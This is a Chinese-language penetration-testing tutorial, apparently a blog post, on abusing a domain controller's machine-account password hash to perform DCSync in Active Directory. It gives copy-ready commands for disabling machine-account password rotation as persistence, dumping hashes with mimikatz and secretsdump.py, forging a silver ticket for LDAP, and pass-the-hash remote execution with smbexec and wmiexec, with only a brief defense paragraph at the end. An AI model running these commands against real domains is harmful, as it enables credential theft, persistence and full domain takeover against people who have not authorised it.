[[344260]]

 0x00 前言

在之前的文章《域滲透——DCSync》提到過DCSync的利用條件：

獲得以下任一用戶的權限：

· Administrators組內的用戶

· Domain Admins組內的用戶

· Enterprise Admins組內的用戶

· 域控制器的計算機帳戶

本文將要補全上篇文章中未提到的最后一種利用方法，介紹如何通過域控制器的計算機帳戶口令hash實現DCSync。

0x01 簡介

本文將要介紹以下內容：

· MachineAccount簡介

· 獲得MachineAccount口令hash的方法

· 使用MachineAccount實現DCSync

· 防御檢測

0x02 MachineAccount簡介

MachineAccount是每臺計算機在安裝系統后默認生成的計算機帳戶。

計算機帳戶的密碼存儲在注冊表的位置：HKLM\SECURITY\Policy\Secrets\$machine.ACC。

如果計算機加入域中，會將計算機帳戶的密碼同步到域控制器并保存在域控制器的NTDS.dit文件中。

計算機帳戶的密碼默認每30天自動更新，密碼長度為120個字符，所以說，即使獲得了計算機帳戶密碼的hash，也很難還原出計算機帳戶的明文口令。

關閉當前計算機帳戶密碼自動更新的兩種方法（適用于工作組）：

1.修改組策略

組策略位置：

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\

如下圖：

默認未啟用，如果設置為啟用后，將會停止更新密碼。

參考資料：

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc785826(v=ws.10)

2.直接修改注冊表

注冊表位置：HKLM\System\CurrentControlSet\Services\Netlogon\Parameters\

將DisablePasswordChange的值設為1。

關閉域內計算機帳戶密碼自動更新的兩種方法（適用于域網絡）：

1.修改組策略

這里需要修改域組策略，在域控制器上打開Group Policy Management后，選擇Default Domain Policy。

如下圖：

組策略位置：

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\

2.修改組策略的配置文件

Default Domain Policy對應的guid為31B2F340-016D-11D2-945F-00C04FB984F9

配置文件路徑為：

例如我的測試環境下，路徑對應為：

\\test.com\SYSVOL\test.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit

修改文件GptTmpl.inf，在[Registry Values]下添加新的內容：

MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange=4,1

如下圖：

強制域控制器更新組策略，命令如下：

gpupdate /force

配置完成，將系統時間調快30天，hash保持不變。

0x03 獲得MachineAccount口令hash的方法

1.通過注冊表文件導出當前計算機帳戶的口令hash

mimikatz命令示例：

privilege::debug
token::elevate
lsadump::secrets

返回的結果中，$machine.ACC項對應計算機帳戶，如下圖：

其他從注冊表導出的方法可參考之前的文章《滲透技巧——通過SAM數據庫獲得本地用戶hash》

2.使用DCSync導出所有計算機帳戶的口令hash

(1)使用mimikatz

在域控制器上使用mimikatz導出域內所有用戶的hash，命令示例：

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

其中以$字符結尾的為計算機帳戶。

其他環境下的使用方法可參考之前的文章《域滲透——DCSync》。

(2)使用secretsdump.py

需要安裝Python環境和Impacket包，實際使用時可以將Python代碼編譯成exe文件。

命令示例：

python secretsdump.py test/Administrator:DomainAdmin123!@192.168.1.1

secretsdump.py相比于mimikatz，最大的優點是支持從域外的計算機連接至域控制器。

secretsdump.py的實現原理：

使用計算機帳戶口令hash通過smbexec或者wmiexec遠程連接至域控制器并獲得高權限，進而從注冊表中導出本地帳戶的hash，同時通過Dcsync或從NTDS.dit文件中導出所有域用戶的hash。

3.通過漏洞CVE-2020-1472

參考資料：

https://www.secura.com/pathtoimg.php?id=2055

CVE-2020-1472能夠在未授權的狀態下遠程修改目標計算機帳戶的口令hash。

注：

CVE-2020-1472只能修改域控制器NTDS.dit文件中保存的計算機帳戶hash，無法修改注冊表中保存的本地計算機帳戶hash。

當域控制器中NTDS.dit文件和注冊表文件的計算機帳戶口令hash不同步時，有可能影響系統的正常功能。

0x04 使用MachineAccount實現DCSync

例如，我們獲得了域控制器DC1的計算機帳戶口令hash為7da530fba3b15a2ea21ce7db8110d57b。

1.使用mimikatz

這里需要制作白銀票據(Silver Ticket)，接著獲得LDAP服務的訪問權限，細節可參考之前的文章《域滲透——Pass The Ticket》。

命令示例：

mimikatz "kerberos::golden /domain:test.com /sid:S-1-5-21-254706111-4049838133-2416586677 /target:DC1.test.com /service:LDAP /rc4:7da530fba3b15a2ea21ce7db8110d57b /user:krbtgt /ptt" "lsadump::dcsync /domain:test.com /all /csv" exit

在細節上需要注意以下方面：

· 只能在域內計算機上運行，不支持域外

· /sid表示域的sid，獲取方法可參考之前的文章《滲透基礎——活動目錄信息的獲取》

· /rc4表示計算機帳戶的NTLM hash

· /user:krbtgt表示偽造成用戶krbtgt，生成票據

注：域sid的簡單獲取方法。

任一域用戶的sid去除最后一位就是域的sid。

2.使用secretsdump

命令示例：

python secretsdump.py -hashes :7da530fba3b15a2ea21ce7db8110d57b test/DC1$@192.168.1.1

在細節上需要注意以下方面：

· secretsdump支持從域外的計算機連接至域控制器

· 如果使用域內普通計算機帳戶的口令hash連接對應的計算機，那么會失敗，提示rpc_s_access_denied

· 可以通過wmiexec.py或smbexec.py遠程執行cmd命令

命令示例：

python smbexec.py -hashes :7da530fba3b15a2ea21ce7db8110d57b test/DC1$@192.168.1.1 whoami /priv
python wmiexec.py -hashes :7da530fba3b15a2ea21ce7db8110d57b test/DC1$@192.168.1.1 whoami /priv

注：

使用計算機帳戶具有高權限，如下圖：

0x05 防御檢測

檢測DCSync后門的方法可參考《域滲透——DCSync》

站在防御的角度，如果域管理員的權限被攻擊者獲得，在嘗試踢出攻擊者的過程中，不僅需要修改域管理員用戶的口令，同樣需要更新計算器帳戶的口令hash，檢測域組策略是否被配置成開啟DisablePasswordChange

0x06 小結

本文介紹了通過域控制器的計算機帳戶口令hash實現DCSync的方法，分析利用思路，給出防御建議。

【編輯推薦】